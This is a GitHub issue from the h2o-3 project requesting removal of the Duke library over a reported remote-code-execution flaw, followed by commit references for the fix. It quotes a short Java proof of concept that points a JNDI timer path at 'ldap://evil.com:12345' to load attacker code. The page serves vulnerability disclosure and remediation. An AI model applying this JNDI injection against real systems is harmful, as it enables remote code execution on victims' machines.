Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Replace h2o-3 dependencies on no.priv.garshol.duke:duke:1.2 with equivalent library. #15687

Closed
wendycwong opened this issue Aug 10, 2023 · 0 comments
Closed

Replace h2o-3 dependencies on no.priv.garshol.duke:duke:1.2 with equivalent library. #15687

wendycwong opened this issue Aug 10, 2023 · 0 comments
Assignees
@mn-mikke
Labels
Security Vulnerability
Milestone
3.42.0.3

Comments

@wendycwong
Copy link
Contributor

According to larsga/Duke#273

Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties) is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, following codes will lead to the execution of arbitrary codes from attackers:

CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);
To Reproduce
Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.
mn-mikke added a commit that referenced this issue Aug 14, 2023
@mn-mikke
[GH-15687] Extract string comparators from Duke library
07522b2
@mn-mikke mn-mikke mentioned this issue Aug 14, 2023
Merged
@mn-mikke mn-mikke added this to the 3.42.0.3 milestone Aug 14, 2023
@mn-mikke mn-mikke mentioned this issue Aug 15, 2023
Closed
mn-mikke added a commit that referenced this issue Aug 16, 2023
@mn-mikke
[GH-15687] Extract string comparators from Duke library (#15692)
48abf3a
Mohit1345 pushed a commit to Mohit1345/h2o-3 that referenced this issue Aug 17, 2023
@mn-mikke @Mohit1345
[h2oaiGH-15687] Extract string comparators from Duke library (h2oai#1…
30c05a9 
…5692)
@mn-mikke mn-mikke mentioned this issue Sep 4, 2023
Closed
mn-mikke added a commit that referenced this issue Oct 10, 2023
@Mohit1345 @mn-mikke
@hannah-tillman @jefffohl
[GH-7079] Added verbose param to h2o.init() and guarded h2o.conn.show…
5406765 
…_status() in h20.py #7079 [nocheck] (#15653)

* [GH-15687] Extract string comparators from Duke library (#15692)

* [GH-15680] Adding installation disclaimer in documentation (#15681)

* ht/adding disclaimer in docs

* ht/added flow & download page

* ht/updated download page

* ht/added security documentation section

* ht/user guide updates

* ht/uniformity

* ht/added additional note to welcome page

* callouts

* ht/banner color switch

* ht/rename callout

---------

Co-authored-by: Jeff Fohl <[email protected]>

* GH-15672: Tomas Fryda suggested instead of changing every test, the change should be made in standalone test.  He provides the code and I just copied and pasted. (#15675)

* Added verbose paramerter to init() in h2o.py also guarded h2oconn.cluster.show_status()

* changes verbose param position before ** kwargs

* final commit

* removed space, and made it in rel-3.42.0

* added space

---------

Co-authored-by: Marek Novotný <[email protected]>
Co-authored-by: Hannah <[email protected]>
Co-authored-by: Jeff Fohl <[email protected]>
Co-authored-by: wendycwong <[email protected]>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@mn-mikke mn-mikke

Labels
Security Vulnerability
Projects
None yet
Milestone
3.42.0.3
Development

No branches or pull requests
2 participants
@mn-mikke @wendycwong